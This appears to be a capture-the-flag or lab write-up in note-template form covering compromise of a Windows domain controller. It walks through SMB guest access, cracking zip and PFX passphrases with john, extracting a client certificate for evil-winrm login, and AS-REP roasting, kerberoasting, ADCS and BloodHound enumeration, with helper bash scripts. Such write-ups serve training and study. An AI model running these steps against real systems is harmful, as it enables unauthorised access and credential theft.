# Lessons Learned
- xxx
---
# After-Action Attack Sequence
- BLUF: xxx
- xxx
---
# Discover Ports & Services
- `ping` test ![[images/Pasted image 20260608193143.png]]
- `nmap` scan - light ![[images/Pasted image 20260608193258.png]]
- create comma separated port list ![[images/Pasted image 20260608193347.png]]
- `nmap` scan - detailed ![[images/Pasted image 20260608193646.png]]
- `nmap` scan - UDP
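The "comma separated port list" step above done with a function instead of by hand, as an added example that is not part of the original notes: it reads the light scan's normal (`-oN`) output and emits the `-p` argument for the detailed scan. The nmap lines inside `sample_nmap_output` are constructed for the demo, not real scan data.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): build the comma-separated port
# list for the detailed "nmap -p" scan from the light scan's normal output.

# Read nmap normal output on stdin, print open ports as "p1,p2,..." (no trailing
# comma). Only lines reporting exactly "open" count; "closed", "filtered" and the
# ambiguous UDP "open|filtered" are dropped, so the list stays tight.
open_ports_csv() {
  grep -E '^[0-9]+/(tcp|udp) +open +' \
  | cut -d/ -f1 \
  | sort -n -u \
  | tr '\n' ',' \
  | sed 's/,$//'
}

# Constructed sample of nmap normal output (not a real scan of the target)
sample_nmap_output() {
  cat <<'EOF'
Nmap scan report for 10.129.11.193
Host is up (0.031s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT     STATE  SERVICE
53/tcp   open   domain
88/tcp   open   kerberos-sec
135/tcp  open   msrpc
139/tcp  open   netbios-ssn
389/tcp  open   ldap
445/tcp  open   microsoft-ds
5986/tcp open   wsmans
9389/tcp closed adws
EOF
}

# Demo on the constructed sample; returns "53,88,135,139,389,445,5986"
demo_ports() { sample_nmap_output | open_ports_csv; }

# Real use, light scan then detailed scan on the ports it found:
#   nmap -p- --min-rate 1000 -oN light.nmap TARGET
#   nmap -sC -sV -p "$(open_ports_csv < light.nmap)" -oN detailed.nmap TARGET
```

Feeding `sort -n -u` first means duplicated lines (for example when two `-oN` files are concatenated) do not produce a duplicated `-p` entry.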
---
# Service Enum
## Port 445 (SMB)
## Null Auth
- `guest` has access to non-default `shares` share ![[images/Pasted image 20260608194002.png]]
- connect to `shares` with `smbclient` ![[images/Pasted image 20260608194136.png]]
- `winrm_backup.zip` is passphrase protected ![[images/Pasted image 20260608194802.png]]
- use `zip2john` on `winrm_backup.zip`![[images/Pasted image 20260608195013.png]]
- crack with `john`, then unzip with the recovered passphrase > this gives us a `.pfx` file ![[images/Pasted image 20260608195206.png]]
- try to use `certipy-ad auth -pfx` on `legacyy_dev_auth.pfx` ![[images/Pasted image 20260608200103.png]]
- a `.pfx` *is* PKCS#12; what we are missing is the container passphrase
- try to view with `openssl` > we need a password ![[images/Pasted image 20260608200151.png]]
- use `pfx2john` on `legacyy_dev_auth.pfx` then `john` to crack ![[images/Pasted image 20260608200726.png]]
- use `openssl pkcs12` with above pfx passphrase to extract `cert.pem` and `key.pem` ![[images/Pasted image 20260608201821.png]]
- try `certipy-ad auth -pfx` on `legacyy_dev_auth.pfx` again while passing in the passphrase > still failing, even with `faketime` (which only helps when the problem is the cert's validity window, not the passphrase) ![[images/Pasted image 20260608201915.png]]
- `legacyy` is one of the users from `rid-brute`, so this is probably a client-auth cert for that account - hmmm
## reset
- re-extract the public cert and private key from the `.pfx` file (both `pkcs12` calls prompt for the PFX passphrase cracked above)
```bash
# encrypted private key; prompts for the PFX passphrase, then for a new PEM passphrase
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out legacyy_dev_auth.key-enc
# strip the PEM passphrase so evil-winrm can read the key without prompting
openssl rsa -in legacyy_dev_auth.key-enc -out legacyy_dev_auth.key
# client certificate only, no key
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legacyy_dev_auth.crt
```
![[images/Pasted image 20260608210115.png]]
- authenticate with the cert/key pair over WinRM-HTTPS using `evil-winrm`
```bash
# -S: SSL (port 5986), -c: client cert, -k: matching private key
evil-winrm -i 10.129.11.193 -S -c legacyy_dev_auth.crt -k legacyy_dev_auth.key
```
![[images/Pasted image 20260608210426.png]]
- explore home share ![[images/Pasted image 20260608210512.png]]
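The reset procedure above wrapped with the checks worth running before the pair is handed to `evil-winrm`, as an added example that is not part of the original notes: does the extracted key actually belong to the cert, whose cert is it, and is it inside its validity window (the reason `faketime` gets reached for). It assumes `openssl` is on `PATH`; `demo_selfsigned` builds a throwaway self-signed identity in place of the real `legacyy_dev_auth.pfx`, and all file names and the passphrase are placeholders.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: the same openssl extraction as
# the reset step, plus a modulus check and a cert summary. Assumes openssl on
# PATH; file names and the passphrase are placeholders.

# Extract the client cert and an unencrypted RSA key from PFX $1 (passphrase $2)
# into $3.crt and $3.key. If openssl 3 reports an unsupported algorithm on a
# Windows-exported PFX (RC2-40 cert bag), add -legacy to both pkcs12 calls.
pfx_extract() {
  pfx="$1"; pass="$2"; out="$3"
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes -out "$out.key.p8"
  # same role as the notes' "openssl rsa" step: normalise the key, no PEM passphrase
  openssl rsa -in "$out.key.p8" -out "$out.key" 2>/dev/null
  rm -f "$out.key.p8"
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -clcerts -nokeys -out "$out.crt"
}

# Print "match" if cert $1 and key $2 carry the same RSA modulus, else "mismatch".
# A mismatch means the wrong key file (or a non-RSA key) was extracted.
pfx_pair_matches() {
  cm=$(openssl x509 -in "$1" -noout -modulus | openssl md5)
  km=$(openssl rsa -in "$2" -noout -modulus 2>/dev/null | openssl md5)
  if [ "$cm" = "$km" ]; then echo match; else echo mismatch; fi
}

# Show what decides whether the cert is usable: subject (whose cert it is),
# notBefore/notAfter (set faketime inside this window if the clock is off) and
# the EKU (Client Authentication is what WinRM cert auth and PKINIT want).
cert_info() {
  openssl x509 -in "$1" -noout -subject -dates
  openssl x509 -in "$1" -noout -ext extendedKeyUsage 2>/dev/null || true
}

# Self-contained demo on a constructed self-signed cert; returns "match mismatch"
demo_selfsigned() {
  d=$(mktemp -d)
  openssl req -x509 -newkey rsa:2048 -nodes -subj /CN=demo-user -days 1 \
    -keyout "$d/orig.key" -out "$d/orig.crt" 2>/dev/null
  openssl pkcs12 -export -in "$d/orig.crt" -inkey "$d/orig.key" \
    -passout pass:demo-passphrase -out "$d/demo.pfx"
  pfx_extract "$d/demo.pfx" demo-passphrase "$d/extracted"
  openssl genrsa -out "$d/other.key" 2048 2>/dev/null  # unrelated key: negative case
  good=$(pfx_pair_matches "$d/extracted.crt" "$d/extracted.key")
  bad=$(pfx_pair_matches "$d/extracted.crt" "$d/other.key")
  rm -rf "$d"
  echo "$good $bad"
}

# Real use (passphrase is the one pfx2john/john recovered):
#   pfx_extract legacyy_dev_auth.pfx '<passphrase>' legacyy_dev_auth
#   pfx_pair_matches legacyy_dev_auth.crt legacyy_dev_auth.key
#   cert_info legacyy_dev_auth.crt
```

The passphrase is passed with `-passin pass:` only so the function is non-interactive; on a shared box prefer `-passin file:` so it does not land in shell history or `ps` output.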
## Users
- `rid-brute` reveals some users ![[images/Pasted image 20260608194257.png]]
- let's create a clean `users.txt` ![[images/Pasted image 20260608194507.png]]
- spraying each username as its own password doesn't work ![[images/Pasted image 20260608204308.png]]
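The "clean `users.txt`" step done as a filter, as an added example that is not part of the original notes: it keeps only `SidTypeUser` entries from `nxc --rid-brute` output, strips the `DOMAIN\` prefix, and drops machine accounts (trailing `$`) so they do not end up in the ASREP-roast or spray list. The lines inside `sample_rid_brute` are constructed in nxc's output format, not real output from the target.

```bash
#!/usr/bin/env bash
# Added example (not from the original notes): rid-brute output -> users.txt

# Read nxc --rid-brute output on stdin, print one bare username per line.
# Groups/aliases (SidTypeGroup, SidTypeAlias) and computer accounts (name$)
# are dropped; names containing spaces are kept intact.
users_from_rid_brute() {
  grep 'SidTypeUser' \
  | sed -E 's/.*\\([^(]+) \(SidTypeUser\).*/\1/' \
  | grep -v '\$$' \
  | sort -u
}

# Constructed sample in the "RID: DOMAIN\name (SidType)" format nxc prints
sample_rid_brute() {
  cat <<'EOF'
SMB  10.129.11.193  445  DC01  [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:inlanefreight.local) (signing:True) (SMBv1:False)
SMB  10.129.11.193  445  DC01  498: INLANEFREIGHT\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB  10.129.11.193  445  DC01  500: INLANEFREIGHT\Administrator (SidTypeUser)
SMB  10.129.11.193  445  DC01  501: INLANEFREIGHT\Guest (SidTypeUser)
SMB  10.129.11.193  445  DC01  502: INLANEFREIGHT\krbtgt (SidTypeUser)
SMB  10.129.11.193  445  DC01  513: INLANEFREIGHT\Domain Users (SidTypeGroup)
SMB  10.129.11.193  445  DC01  1000: INLANEFREIGHT\DC01$ (SidTypeUser)
SMB  10.129.11.193  445  DC01  1601: INLANEFREIGHT\legacyy (SidTypeUser)
EOF
}

# Demo on the constructed sample: Administrator, Guest, krbtgt, legacyy
demo_users() { sample_rid_brute | users_from_rid_brute; }

# Real use:
#   nxc smb TARGET -u guest -p '' --rid-brute | users_from_rid_brute > users.txt
```

`krbtgt` survives the filter on purpose: it is a real account and harmless in an ASREP-roast list, but drop it before any password spray since it is disabled and only adds noise to the DC's logs.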
## Port xxx (protocol): service_name ver. xxx
- xxx
---
# AD Enum
## ASREP Roasting
```bash
nxc ldap TARGET -d inlanefreight.local -u users.txt -p '' --asreproast asrep.out
```
## Kerberoasting
```bash
nxc ldap TARGET -d inlanefreight.local -u username -p password --kerberoasting kerb.out
```
## ADCS
```bash
nxc ldap TARGET -d inlanefreight.local -u username -p password -M adcs
certipy-ad find -target DC.FQDN -u username -p password
```
## BloodHound
- Run remote ingestor
```bash
/opt/rusthound-ce -d inlanefreight.local -u username@inlanefreight.local -p password -z
```
- Spin up container for bloodhound GUI
```bash
cd /opt/bloodhound
docker compose up -d
```
---
# AD Attack Chain
---
# Revisit Service Enum